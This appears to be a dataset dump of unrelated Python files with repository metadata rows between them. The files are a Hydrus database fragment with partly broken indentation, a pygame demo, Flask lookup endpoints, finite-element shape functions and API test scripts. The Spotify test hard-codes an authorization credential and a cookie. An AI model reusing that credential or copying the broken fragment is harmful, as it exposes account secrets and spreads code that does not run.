        return self._missing_tag_service_pairs
def GetTablesAndColumnsThatUseDefinitions( self, content_type: int ) -> typing.List[ typing.Tuple[ str, str ] ]:
tables_and_columns = []
if content_type == HC.CONTENT_TYPE_TAG:
table_dict = self._GetServicesTableGenerationDict()
for table_name in table_dict.keys():
tables_and_columns.append( ( table_name, 'tag_id' ) )
elif content_type == HC.CONTENT_TYPE_HASH:
table_dict = self._GetServicesTableGenerationDict()
for table_name in table_dict.keys():
tables_and_columns.append( ( table_name, 'hash_id' ) )
return tables_and_columns
    def PendMappings( self, tag_service_id, tag_id, hash_ids, filtered_hashes_generator: FilteredHashesGenerator ):
        """For each file service holding the hashes, add ( tag_id, hash_id ) rows to the pending cache and bump pending counts."""
        for ( file_service_id, filtered_hash_ids ) in filtered_hashes_generator.IterateHashes( hash_ids ):
            ( cache_current_mappings_table_name, cache_deleted_mappings_table_name, cache_pending_mappings_table_name ) = ClientDBMappingsStorage.GenerateSpecificMappingsCacheTableNames( file_service_id, tag_service_id )
            self._ExecuteMany( 'INSERT OR IGNORE INTO ' + cache_pending_mappings_table_name + ' ( hash_id, tag_id ) VALUES ( ?, ? );', ( ( hash_id, tag_id ) for hash_id in filtered_hash_ids ) )
            # OR IGNORE means only genuinely new rows count towards the pending total
            num_added = self._GetRowCount()
            if num_added > 0:
                counts_cache_changes = [ ( tag_id, 0, num_added ) ]
                self.modules_mappings_counts_update.AddCounts( ClientTags.TAG_DISPLAY_STORAGE, file_service_id, tag_service_id, counts_cache_changes )
            self.modules_mappings_cache_specific_display.PendMappings( file_service_id, tag_service_id, tag_id, filtered_hash_ids )
    def RegeneratePending( self, file_service_id, tag_service_id, status_hook = None ):
        """Rebuild this pair's pending cache (and pending counts) from the master pending mappings table, reporting progress through status_hook."""
        ( current_mappings_table_name, deleted_mappings_table_name, pending_mappings_table_name, petitioned_mappings_table_name ) = ClientDBMappingsStorage.GenerateMappingsTableNames( tag_service_id )
        ( cache_current_mappings_table_name, cache_deleted_mappings_table_name, cache_pending_mappings_table_name ) = ClientDBMappingsStorage.GenerateSpecificMappingsCacheTableNames( file_service_id, tag_service_id )
        if status_hook is not None:
            message = 'clearing old specific data'
            status_hook( message )
        all_pending_storage_tag_ids = self._STS( self._Execute( 'SELECT DISTINCT tag_id FROM {};'.format( pending_mappings_table_name ) ) )
        # wipe only the pending side; current rows and current counts are kept
        self.modules_mappings_counts.ClearCounts( ClientTags.TAG_DISPLAY_STORAGE, file_service_id, tag_service_id, keep_current = True )
        self._Execute( 'DELETE FROM {};'.format( cache_pending_mappings_table_name ) )
        counts_cache_changes = []
        num_to_do = len( all_pending_storage_tag_ids )
        select_table_join = self.modules_files_storage.GetTableJoinLimitedByFileDomain( file_service_id, pending_mappings_table_name, HC.CONTENT_STATUS_CURRENT )
        for ( i, storage_tag_id ) in enumerate( all_pending_storage_tag_ids ):
            if i % 100 == 0 and status_hook is not None:
                message = 'regenerating pending tags {}'.format( HydrusData.ConvertValueRangeToPrettyString( i + 1, num_to_do ) )
                status_hook( message )
            # copy this tag's pending rows, limited to files current in this file domain
            self._Execute( 'INSERT OR IGNORE INTO {} ( tag_id, hash_id ) SELECT tag_id, hash_id FROM {} WHERE tag_id = ?;'.format( cache_pending_mappings_table_name, select_table_join ), ( storage_tag_id, ) )
            pending_delta = self._GetRowCount()
            counts_cache_changes.append( ( storage_tag_id, 0, pending_delta ) )
        self.modules_mappings_counts_update.AddCounts( ClientTags.TAG_DISPLAY_STORAGE, file_service_id, tag_service_id, counts_cache_changes )
        self.modules_mappings_cache_specific_display.RegeneratePending( file_service_id, tag_service_id, status_hook = status_hook )
def RescindPendingMappings( self, tag_service_id, tag_id, hash_ids, filtered_hashes_generator: FilteredHashesGenerator ):
for ( file_service_id, filtered_hash_ids ) in filtered_hashes_generator.IterateHashes( hash_ids ):
( cache_current_mappings_table_name, cache_deleted_mappings_table_name, cache_pending_mappings_table_name ) = ClientDBMappingsStorage.GenerateSpecificMappingsCacheTableNames( file_service_id, tag_service_id )
ac_counts = collections.Counter()
self.modules_mappings_cache_specific_display.RescindPendingMappings( file_service_id, tag_service_id, tag_id, filtered_hash_ids )
self._ExecuteMany( 'DELETE FROM ' + cache_pending_mappings_table_name + ' WHERE hash_id = ? AND tag_id = ?;', ( ( hash_id, tag_id ) for hash_id in filtered_hash_ids ) )
num_deleted = self._GetRowCount()
if num_deleted > 0:
counts_cache_changes = [ ( tag_id, 0, num_deleted ) ]
self.modules_mappings_counts_update.ReduceCounts( ClientTags.TAG_DISPLAY_STORAGE, file_service_id, tag_service_id, counts_cache_changes )
| [
"hydrus.admin@gmail.com"
] | hydrus.admin@gmail.com |
078f1c67f72061d6446f7ee3438d940e228c5efe | fd3b3d5c5adfd0599f158599d7d64857dbb54f31 | /Python_Work/c14Work/walls.py | 2c7a1cfb5f71a403ceed46ac95506a75edd03c28 | [] | no_license | BySRenovatio/Projects-in-Python | 3776ef50be956c85014312295b30df164b58ff56 | a29a1988dfb95b5d3491476e84d1c73c1b905f6f | refs/heads/master | 2020-03-21T21:33:41.288152 | 2018-06-28T21:30:55 | 2018-06-28T21:30:55 | 139,070,285 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,233 | py | """
Sample Python/Pygame Programs
Simpson College Computer Science
http://programarcadegames.com/
http://simpson.edu/computer-science/
From:
http://programarcadegames.com/python_examples/f.php?file=move_with_walls_example
Explanation video: http://youtu.be/8IRyt7ft7zg
Part of a series:
http://programarcadegames.com/python_examples/f.php?file=move_with_walls_example.py
http://programarcadegames.com/python_examples/f.php?file=maze_runner.py
http://programarcadegames.com/python_examples/f.php?file=platform_jumper.py
http://programarcadegames.com/python_examples/f.php?file=platform_scroller.py
http://programarcadegames.com/python_examples/f.php?file=platform_moving.py
http://programarcadegames.com/python_examples/sprite_sheets/
"""
import pygame
"""
Global constants
"""
# Colors
BLACK = ( 0, 0, 0)
WHITE = ( 255, 255, 255)
BLUE = ( 0, 0, 255)
# Screen dimensions
SCREEN_WIDTH = 800
SCREEN_HEIGHT = 600
# This class represents the white square that the player moves around.
class Player(pygame.sprite.Sprite):
    """ The player-controlled sprite; it collides against the walls in
    self.walls (a pygame.sprite.Group assigned after construction). """

    # Constructor function
    def __init__(self, x, y):
        """ Create the player with its top-left corner at (x, y). """
        # Call the parent's constructor
        super().__init__()

        # Speed vector and wall group are per-instance state.  They used to
        # be class attributes, which risks accidental sharing between
        # instances; initializing them here is safer and equivalent.
        self.change_x = 0
        self.change_y = 0
        self.walls = None

        # Set height, width
        self.image = pygame.Surface([15, 15])
        self.image.fill(WHITE)

        # Make our top-left corner the passed-in location.
        self.rect = self.image.get_rect()
        self.rect.y = y
        self.rect.x = x

    def changespeed(self, x, y):
        """ Add (x, y) to the current speed vector. """
        self.change_x += x
        self.change_y += y

    def update(self):
        """ Move by the speed vector, one axis at a time, stopping at walls. """
        # Move left/right first, then resolve horizontal collisions.
        self.rect.x += self.change_x

        # Did this update cause us to hit a wall?
        block_hit_list = pygame.sprite.spritecollide(self, self.walls, False)
        for block in block_hit_list:
            if self.change_x > 0:
                # Moving right: snap our right edge to the wall's left edge.
                self.rect.right = block.rect.left
            else:
                # Moving left: snap our left edge to the wall's right edge.
                self.rect.left = block.rect.right

        # Then move up/down and resolve vertical collisions the same way.
        self.rect.y += self.change_y

        block_hit_list = pygame.sprite.spritecollide(self, self.walls, False)
        for block in block_hit_list:
            # Reset our position based on the top/bottom of the object.
            if self.change_y > 0:
                self.rect.bottom = block.rect.top
            else:
                self.rect.top = block.rect.bottom
class Wall(pygame.sprite.Sprite):
    """ A solid blue rectangle that the player cannot pass through. """

    def __init__(self, x, y, width, height):
        """ Build a wall with its top-left corner at (x, y). """
        super().__init__()

        # A plain blue surface of the requested size.
        self.image = pygame.Surface([width, height])
        self.image.fill(BLUE)

        # Position the sprite via its bounding rectangle.
        self.rect = self.image.get_rect()
        self.rect.topleft = (x, y)
# Call this function so the Pygame library can initialize itself
pygame.init()
# Create an 800x600 sized screen
screen = pygame.display.set_mode([SCREEN_WIDTH, SCREEN_HEIGHT])
# Set the title of the window
pygame.display.set_caption('Test')
# List to hold all the sprites
all_sprite_list = pygame.sprite.Group()
# Make the walls. (x_pos, y_pos, width, height)
wall_list = pygame.sprite.Group()
# Left border wall.
wall = Wall(0, 0, 10, 600)
wall_list.add(wall)
all_sprite_list.add(wall)
# Top border wall.
wall = Wall(10, 0, 790, 10)
wall_list.add(wall)
all_sprite_list.add(wall)
# Small interior obstacle.
wall = Wall(10, 200, 100, 10)
wall_list.add(wall)
all_sprite_list.add(wall)
# Create the player paddle object
player = Player(50, 50)
player.walls = wall_list
all_sprite_list.add(player)
clock = pygame.time.Clock()
done = False
# -------- Main program loop --------
while not done:
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            done = True
        elif event.type == pygame.KEYDOWN:
            # Arrow key pressed: add to the player's speed vector.
            if event.key == pygame.K_LEFT:
                player.changespeed(-3, 0)
            elif event.key == pygame.K_RIGHT:
                player.changespeed(3, 0)
            elif event.key == pygame.K_UP:
                player.changespeed(0, -3)
            elif event.key == pygame.K_DOWN:
                player.changespeed(0, 3)
        elif event.type == pygame.KEYUP:
            # Arrow key released: cancel the speed added by the key press.
            if event.key == pygame.K_LEFT:
                player.changespeed(3, 0)
            elif event.key == pygame.K_RIGHT:
                player.changespeed(-3, 0)
            elif event.key == pygame.K_UP:
                player.changespeed(0, 3)
            elif event.key == pygame.K_DOWN:
                player.changespeed(0, -3)
    # Move sprites, then redraw the frame.
    all_sprite_list.update()
    screen.fill(BLACK)
    all_sprite_list.draw(screen)
    pygame.display.flip()
    # Limit to 60 frames per second.
    clock.tick(60)
pygame.quit()
"40674806+BySRenovatio@users.noreply.github.com"
] | 40674806+BySRenovatio@users.noreply.github.com |
0a97db3af87cc1ef1bac4964125abf2be116299f | 5fac3f1dbac1d859f17b41dc243f146ef1db3e91 | /models/model.py | 1fc9f95333a3bc67c6290dfc56625a5d7b8fe1df | [] | no_license | ftelechea/apiDatosRef | 63c0afca0f23acf20008ba69a66232d4edc39e2a | 3d281fd47e8ec84f83c11dc6cd8d4ee108af36e4 | refs/heads/master | 2022-12-15T09:57:27.459755 | 2020-09-04T11:10:50 | 2020-09-04T11:10:50 | 292,270,644 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,734 | py | from flask_restful import Resource
import models.database_command as db
class Paises(Resource):
    # Read-only catalogue endpoint: country codes per ISO 3166-1:2007.
    # The get() docstring below is a flasgger/swagger spec that is read at
    # runtime, so it is left untouched (including its mis-encoded accents).
    def get(self):
        """
        Retorna la lista de Paรญses
        Codificaciรณn de paรญses de acuerdo a la norma ISO 3166-1:2007
        ---
        tags:
          - paises
        responses:
          200:
            description: lista de paรญses
            schema:
              id: Paises
              properties:
                cod_pais:
                  type: string
                  description: Cรณdigo de Paรญs
                cod_alfa_2:
                  type: string
                  description: Cรณdigo alfanumรฉrico de 2 caracteres
                cod_alfa_3:
                  type: string
                  description: Cรณdigo alfanumรฉrico de 3 caracteres
                nombre_pais:
                  type: string
                  description: Nombre de Paรญs
        """
        # open a database connection (was: 'crear conexion a la base')
        my_data_access = db.DatabaseCommand()
        select_Query = ("select "
                        "cod_pais, "
                        "cod_alfa_2, "
                        "cod_alfa_3, "
                        "nombre_pais "
                        "from dat_referenciales.cod_paises "
                        "order by nombre_pais")
        # run the sql statement and return the rows (was: 'ejecutar sentencia sql')
        result = my_data_access.execute_sql_dataset(select_Query)
        return result
class Departamentos(Resource):
    # Read-only catalogue endpoint: department codes per ISO 3166-2:2007.
    # The get() docstring below is a flasgger/swagger spec read at runtime,
    # so it is left untouched (including encoding artifacts and typos).
    def get(self):
        """
        Retorna la lista de Departamentos
        Codificaciรณn de acuerdo a la norma ISO 3166-2:2007
        ---
        tags:
          - departamentos
        responses:
          200:
            description: lista de departamentos
            schema:
              id: Departamentos
              properties:
                cod_departamento:
                  type: string
                  description: Cรณdigo de Departamanto
                nombre_departamento:
                  type: string
                  description: Nombre de Departamanto
        """
        # open a database connection (was: 'crear conexion a la base')
        my_data_access = db.DatabaseCommand()
        select_Query = ("select "
                        "cod_departamento, "
                        "nombre_departamento "
                        "from dat_referenciales.cod_departamentos "
                        "order by nombre_departamento")
        # run the sql statement and return the rows (was: 'ejecutar sentencia sql')
        result = my_data_access.execute_sql_dataset(select_Query)
        return result
class Sexos(Resource):
    # Read-only catalogue endpoint: sex codes (WHO biological definition).
    # The get() docstring below is a flasgger/swagger spec read at runtime,
    # so it is left untouched (including encoding artifacts).
    def get(self):
        """
        Retorna la lista de Sexos
        Codificaciรณn del sexo entendido como โel conjunto de caracterรญsticas biolรณgicas que definen al espectro de humanos como hembras y machos" (Organizaciรณn Mundial de la Salud).
        ---
        tags:
          - sexos
        responses:
          200:
            description: lista de sexos
            schema:
              id: Sexos
              properties:
                cod_sexo:
                  type: integer
                  description: Cรณdigo de Sexo
                nombre_sexo:
                  type: string
                  description: Nombre de Sexo
                descripcion_sexo:
                  type: string
                  description: Descripciรณn de Sexo
        """
        # open a database connection (was: 'crear conexion a la base')
        my_data_access = db.DatabaseCommand()
        select_Query = ("select "
                        "cod_sexo, "
                        "nombre_sexo, "
                        "descripcion_sexo "
                        "from dat_referenciales.cod_sexos "
                        "order by cod_sexo")
        # run the sql statement and return the rows (was: 'ejecutar sentencia sql')
        result = my_data_access.execute_sql_dataset(select_Query)
        return result
class Generos(Resource):
    # Read-only catalogue endpoint: gender codes (cultural construction).
    # The get() docstring below is a flasgger/swagger spec read at runtime,
    # so it is left untouched (including encoding artifacts).
    def get(self):
        """
        Retorna la lista de Gรฉneros
        Codificaciรณn del gรฉnero entendido como la construcciรณn cultural referida a la diferencia sexual de los individuos de la especie humana
        ---
        tags:
          - gรฉneros
        responses:
          200:
            description: lista de gรฉneros
            schema:
              id: Generos
              properties:
                cod_genero:
                  type: integer
                  description: Cรณdigo de Gรฉnero
                nombre_genero:
                  type: string
                  description: Nombre de Gรฉnero
                descripcion_genero:
                  type: string
                  description: Descripciรณn de Gรฉnero
        """
        # open a database connection (was: 'crear conexion a la base')
        my_data_access = db.DatabaseCommand()
        select_Query = ("select "
                        "cod_genero, "
                        "nombre_genero, "
                        "descripcion_genero "
                        "from dat_referenciales.cod_generos "
                        "order by cod_genero")
        # run the sql statement and return the rows (was: 'ejecutar sentencia sql')
        result = my_data_access.execute_sql_dataset(select_Query)
        return result
class EstadosCiviles(Resource):
    # Read-only catalogue endpoint: civil status codes.
    # The get() docstring below is a flasgger/swagger spec read at runtime,
    # so it is left untouched (including encoding artifacts).
    def get(self):
        """
        Retorna la lista de Estados Civiles
        Codificaciรณn del estado civil entendido como la situaciรณn de las personas determinada por sus relaciones de familia, provenientes del matrimonio, que establece ciertos derechos y deberes
        ---
        tags:
          - estados civiles
        responses:
          200:
            description: lista de estados civiles
            schema:
              id: EstadosCiviles
              properties:
                cod_estado_civil:
                  type: string
                  description: Cรณdigo de Estado Civil
                nombre_estado_civil:
                  type: string
                  description: Nombre de Estado Civil
                descripcion_estado_civil:
                  type: string
                  description: Descripciรณn de Estado Civil
        """
        # open a database connection (was: 'crear conexion a la base')
        my_data_access = db.DatabaseCommand()
        select_Query = ("select "
                        "cod_estado_civil, "
                        "nombre_estado_civil, "
                        "descripcion_estado_civil "
                        "from dat_referenciales.cod_estados_civiles "
                        "order by nombre_estado_civil")
        # run the sql statement and return the rows (was: 'ejecutar sentencia sql')
        result = my_data_access.execute_sql_dataset(select_Query)
        return result
class TiposDocumentosPersona(Resource):
    # Read-only catalogue endpoint: person-identity document types
    # (UNAOID adaptation of the ICAO standard, per the spec below).
    # The get() docstring is a flasgger/swagger spec read at runtime,
    # so it is left untouched (including encoding artifacts).
    def get(self):
        """
        Retorna la lista de Tipos de Documentos que identifican Personas
        Codificaciรณn segรบn adaptaciรณn de la UNAOID para el estรกndar ICAO
        ---
        tags:
          - tipos documentos persona
        responses:
          200:
            description: lista de tipos de documento
            schema:
              id: TiposDocumentosPersona
              properties:
                cod_tipo_documento:
                  type: integer
                  description: Cรณdigo de Tipo de Documento
                descripcion_tipo_documento:
                  type: string
                  description: Descripciรณn del Tipo de Documento
        """
        # open a database connection (was: 'crear conexion a la base')
        my_data_access = db.DatabaseCommand()
        select_Query = ("select "
                        "cod_tipo_documento, "
                        "descripcion_tipo_documento "
                        "from dat_referenciales.cod_tipos_documentos "
                        "order by cod_tipo_documento")
        # run the sql statement and return the rows (was: 'ejecutar sentencia sql')
        result = my_data_access.execute_sql_dataset(select_Query)
        return result
"noreply@github.com"
] | ftelechea.noreply@github.com |
7101f41dbc95bab298f836e2d61dd7d024040609 | f33a971e5c13c724712c97f6d13e585f8526c4a0 | /server/Test.py | 140e2a53d5e65fe739c7026c80bf1fb468d2e0a8 | [] | no_license | Thermomiplex/Thermominator | 7bec8a44eb363001d383c2dc38715ba461e992f7 | 5b6ffa4ed5247655781011c7e0aeeabfc30320b6 | refs/heads/master | 2021-03-12T23:02:35.682883 | 2013-11-29T16:09:23 | 2013-11-29T16:09:23 | 13,584,401 | 1 | 1 | null | 2013-10-24T13:20:37 | 2013-10-15T08:23:06 | Java | UTF-8 | Python | false | false | 160 | py | from py4j.java_gateway import JavaGateway
gateway = JavaGateway()
java_object = gateway.jvm.soton.Test()
other_object = java_object.hello()
print other_object
| [
"amir@amir-laptop.(none)"
] | amir@amir-laptop.(none) |
cfe01345e37aadfec5a5a2ccb5e0ad6c4a9df927 | 9d278285f2bc899ac93ec887b1c31880ed39bf56 | /ondoc/doctor/migrations/0192_auto_20190125_1514.py | 3779ca4d7f242aa5bd1e5ad30a90d32209c5bc7d | [] | no_license | ronit29/docprime | 945c21f8787387b99e4916cb3ba1618bc2a85034 | 60d4caf6c52a8b70174a1f654bc792d825ba1054 | refs/heads/master | 2023-04-01T14:54:10.811765 | 2020-04-07T18:57:34 | 2020-04-07T18:57:34 | 353,953,576 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 433 | py | # Generated by Django 2.0.5 on 2019-01-25 09:44
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('doctor', '0191_auto_20190124_1845'),
]
operations = [
migrations.AlterField(
model_name='cancellationreason',
name='type',
field=models.PositiveSmallIntegerField(blank=True, default=None, null=True),
),
]
| [
"shashanks@policybazaar.com"
] | shashanks@policybazaar.com |
36710a7d12616b5644f99cb4df293b84763d2c31 | fcd5be464ccb9005f0f656a2405c1e2d05420d3c | /triangular elements shape functions 2D.py | c63f7eaa816281ee435611a58728ba9d149067c4 | [] | no_license | patozavala/finite-elements-codes | ef023fab91c1c163209150fb4d11e380f2cbd20a | df0f265fb4c8d1836728ea4c2d85e988e6c4e547 | refs/heads/main | 2023-04-05T03:15:57.168629 | 2021-04-13T03:17:52 | 2021-04-13T03:17:52 | 193,142,447 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,995 | py | import numpy as np
def gauss_quadrature_triangle(k):
"""
this routine gives the quadrature points and weights of quadrature to
integrate numerically a polynomial of order "k".
:param k: polynomial order to approximate
:return: xi : coordinates of quad points
w : value of quad weight
"""
if k == 1:
xi = np.array([[1 / 3, 1 / 3]])
w = np.array([0.5])
elif k == 2:
xi = np.array([[2 / 3., 1. / 6.], [1. / 6., 2. / 3.], [1. / 6., 1. / 6.]])
w = np.array([1. / 6., 1. / 6., 1. / 6.])
elif k == 3:
xi = np.array([[1. / 3., 1. / 3.], [3. / 5., 1. / 5.], [1. / 5., 3. / 5.], [1. / 5., 1. / 5.]])
w = np.array([-27. / 96., 25. / 96., 25. / 96., 25. / 96.])
return xi, w
def p1_shape_function(triangle, xi):
"""
this routine evaluates the shape functions and their spatial gradients
at the quadrature points in the iso-parametric configuration for P1-elements
:param triangle: nodes of the of the elements in non-iso parametric configuration
:param xi: point of quadrature
:return: N : values โโof the function as assessed at the quad point.
DN : gradient of N
J : Jacobian
"""
xi1, xi2 = xi
xi3 = 1 - xi1 - xi2
N1hat = xi1
N2hat = xi2
N3hat = xi3
N = np.vstack((N1hat, N2hat, N3hat))
nabla_Nhat = np.array([[1., 0., -1.], [0., 1., -1.]])
J = np.dot(triangle, nabla_Nhat.T)
nabla_N = np.dot(np.linalg.inv(J.T), nabla_Nhat)
return N, nabla_N, J
def p2_shape_function(triangle, xi):
"""
this routine evaluates the shape functions and their spatial gradients
at the quadrature points in the iso-parametric configuration for P2-elements
:param triangle: nodes of the of the elements in non-iso parametric configuration
:param xi: point of quadrature
:return: N : values of the function as assessed at the quad point.
nabla_N : gradient of N
J : Jacobian
"""
xi1, xi2 = xi
xi3 = 1 - xi1 - xi2
n1hat = xi1 * (2. * xi1 - 1.)
n2hat = xi2 * (2. * xi2 - 1.)
n3hat = xi3 * (2. * xi3 - 1.)
n4hat = 4. * xi1 * xi2
n5hat = 4. * xi2 * xi3
n6hat = 4. * xi1 * xi3
N = np.vstack((n1hat, n2hat, n3hat, n4hat, n5hat, n6hat))
nabla_Nhat = np.array([[4. * xi1 - 1., 0., -(4. * xi3 - 1.), 4. * xi2, - 4. * xi2, 4. * (xi3 - xi1)],
[0., 4. * xi2 - 1., -(4. * xi3 - 1.), 4. * xi1, 4. * (xi3 - xi2), - 4. * xi1]])
J = np.dot(triangle, nabla_Nhat.T)
nabla_N = np.dot(np.linalg.inv(J.T), nabla_Nhat)
return N, nabla_N, J
"""
Execution
"""
n = 2
xi = gauss_quadrature_triangle(n)[0][0]
x_p1 = np.array([[0, 0], [0, 3], [5, 0]]).T
x_p2 = np.array([[0, 0], [0, 1.5], [2.5, 0], [2.5, 1.5], [0, 3], [5, 0]]).T
print(p1_shape_function(triangle=x_p1, xi=xi))
print(p2_shape_function(triangle=x_p2, xi=xi))
| [
"noreply@github.com"
] | patozavala.noreply@github.com |
71f8ffebaa5401937cf79dbf6d5fb29112bac31b | 964092cfec6190072ea82d698ff0e0fe77fd9e24 | /tests/test_common.py | 3bba840560b16e5d2e69b6099da72f13f8c506a3 | [] | permissive | esanzy87/codef-python | 2ce851d870be8c04d97a7a3e28169cef2b8f877b | cd60a3b58781937c17f14732fb0dd546186c4cc8 | refs/heads/master | 2021-05-22T13:19:14.023617 | 2020-04-22T06:36:14 | 2020-04-22T06:36:14 | 252,943,726 | 1 | 0 | MIT | 2020-04-22T06:36:16 | 2020-04-04T08:09:44 | Python | UTF-8 | Python | false | false | 968 | py | import unittest
from . import invoker_factory
class CommonTestCase(unittest.TestCase):
"""
๊ด๋ฆฌ๋จ์ ํด๋นํ๋ ๊ณตํต API ํ
์คํธ์ผ์ด์ค
"""
@classmethod
def setUpClass(cls):
cls.invoker = invoker_factory.get_invoker()
cls.connected_id = '8OLsIxnamncje8lkUuKax-O'
def test_fetch_connected_id_list(self):
"""
์ ์ฒด ์ปค๋ฅํฐ๋ ์์ด๋ ๋ชฉ๋ก ์กฐํ
:return:
"""
response_body = self.invoker.fetch_connected_id_list()
self.assertEqual(response_body['result']['code'], 'CF-00000')
def test_fetch_organization_list(self):
"""
์ปค๋ฅํฐ๋ ์์ด๋์ ์ฐ๋๋ ๊ธ์ต๊ธฐ๊ด (์ํ/์นด๋) ๋ฆฌ์คํธ ์กฐํ
:return:
"""
response_body = self.invoker.fetch_account_list(connected_id=self.connected_id)
self.assertEqual(response_body['result']['code'], 'CF-00000')
# Allow running this test module directly with `python <file>`.
if __name__ == '__main__':
    unittest.main()
| [
"esanzy87@gmail.com"
] | esanzy87@gmail.com |
c6b09b750eb78aec189548cc6ec9e8369cccd1d6 | 11910a7ffbc26b9c727bd79682d5edcf7c44de6f | /com/tests/test_api.py | 3600477c34814475cf4b574485d55ff314caebc7 | [] | no_license | AnbuHumbleFool/AutomationUtility | 6bf25c8f523befd8e856c3c6ce2eee5105a85916 | 1020f1b383bb51bcce52ff1fbd4730338a411f8f | refs/heads/master | 2023-04-01T19:50:15.014521 | 2023-03-25T11:21:09 | 2023-03-25T11:21:09 | 283,449,960 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,290 | py | import pytest
import json
import requests
import csv
# import pandas as pd
class WholeAPITest():
    # NOTE(review): this suite cannot run as written -- the methods are
    # decorated with @pytest.fixture (so pytest collects them as fixtures,
    # not tests), and the parameters they request (bearer_token, artist_id,
    # headers2, track_id) are not registered fixture names, so fixture
    # resolution would fail.  Presumably each step was meant to be a fixture
    # named after the value it returns; confirm the intended design.
    @pytest.fixture
    def test_one(self):
        # Fetch bearer token
        # /.................................Test Case 1...................................../
        # NOTE(review): hard-coded client credentials and cookie below --
        # these should live in config/environment, not source control.
        url = 'https://accounts.spotify.com/api/token'
        payload = {'grant_type': 'client_credentials'}
        headers = {
            'Authorization': 'Basic YzE0ZDBiMWFlMjlmNGY5Yjg2ZWNlOGZkMTNhNmYyMjk6NmIyYjBlZDMxNTA3NDYxZTk0ZjIxMzdhMzc5ODZhMjE=',
            'Content-Type': 'application/x-www-form-urlencoded',
            'Cookie': '__Host-device_id=AQD6B9_lD9MJcRtLUYurVItK60k_EK8KAX9UaG6hW4A80pSf46DQUQXuAn47_BqXOVCoTTdRy-nujG4FWVL4IwqAF2JCWf8HzPA; sp_tr=false'}
        res = requests.post(url, data=payload, headers=headers)
        print(res.content)
        print(res.status_code)
        # print(res.get('access_token'))
        jsonResponse = res.json()
        bearer_token = jsonResponse["access_token"]
        print(bearer_token)
        return bearer_token
    @pytest.fixture
    def test_two(self, bearer_token):
        # Search for AR Rahman artist
        # /.................................Test Case 2...................................../
        url2 = 'https://api.spotify.com/v1/search?query=A.R.+Rahman&offset=0&limit=20&type=artist'
        headers2 = {'Authorization': 'Bearer ' + bearer_token}
        # payload2 = {'query': 'A.R.+Rahman','offset': '0', 'limit'}
        res2 = requests.get(url2, headers=headers2
                            )
        print(res2.content)
        t2JsonResponse = res2.json()
        # Response - Fetch Artist id
        artist_id = t2JsonResponse["artists"]["items"][0]["id"]
        print(artist_id)
        return artist_id
    # /.................................Test Case 3...................................../
    # Search for his top tracks by using the artist id from the above response
    @pytest.fixture
    def test_three(self, artist_id, headers2):
        # NOTE(review): headers2 is a local variable of test_two, not a
        # fixture -- this parameter cannot be resolved by pytest as written.
        url3 = 'https://api.spotify.com/v1/artists/' + artist_id + '/top-tracks?market=in'
        res3 = requests.get(url3, headers= headers2)
        print(res3.content)
        t3JsonResponse = res3.json()
        track_id = t3JsonResponse["tracks"][0]["id"]
        print(track_id)
        return track_id
    # Fetch any one track from the list above and the respective artists/ artist for that track and store It in CSV/flat file
    # Validation: Search for the track using the track id stored in CSV,
    # /.................................Test Case 4...................................../
    @pytest.fixture
    def test_four(self, track_id, artist_id, headers2):
        url4 = 'https://api.spotify.com/v1/tracks/' + track_id
        res4 = requests.get(url4, headers=headers2)
        print(res4.content)
        t4JsonResponse = res4.json()
        # Fetch Artist name
        artist_name = t4JsonResponse["artists"][0]["name"]
        print(artist_name)
        # NOTE(review): absolute Windows paths below only work on one machine;
        # prefer pytest's tmp_path or a relative output directory.
        # Validation: Search for the track using the track id stored in CSV
        with open("C:/Users/DELL/Desktop/sample.json", "w") as outfile:
            json.dump(t4JsonResponse, outfile)
        with open('C:/Users/DELL/Desktop/sample.json') as json_file:
            data = json.load(json_file)
            print(data)
        employee_data = data['artists']
        # now we will open a file for writing
        data_file = open('C:/Users/DELL/Desktop/data_file.csv', 'w')
        # create the csv writer object
        csv_writer = csv.writer(data_file)
        # Counter variable used for writing
        # headers to the CSV file
        count = 0
        for emp in employee_data:
            if count == 0:
                # Writing headers of CSV file
                header = emp.keys()
                csv_writer.writerow(header)
                count += 1
            # Writing data of CSV file
            csv_writer.writerow(emp.values())
        data_file.close()
        # Validation: Search for the track using the track id stored in CSV
        FILE_NAME = 'C:/Users/DELL/Desktop/data_file.csv'
        with open(FILE_NAME, 'rt') as f:
            data_excel = csv.reader(f)
            for row in data_excel:
                if artist_id in row:
                    print(row)
"itanbarasan.gmail.com"
] | itanbarasan.gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.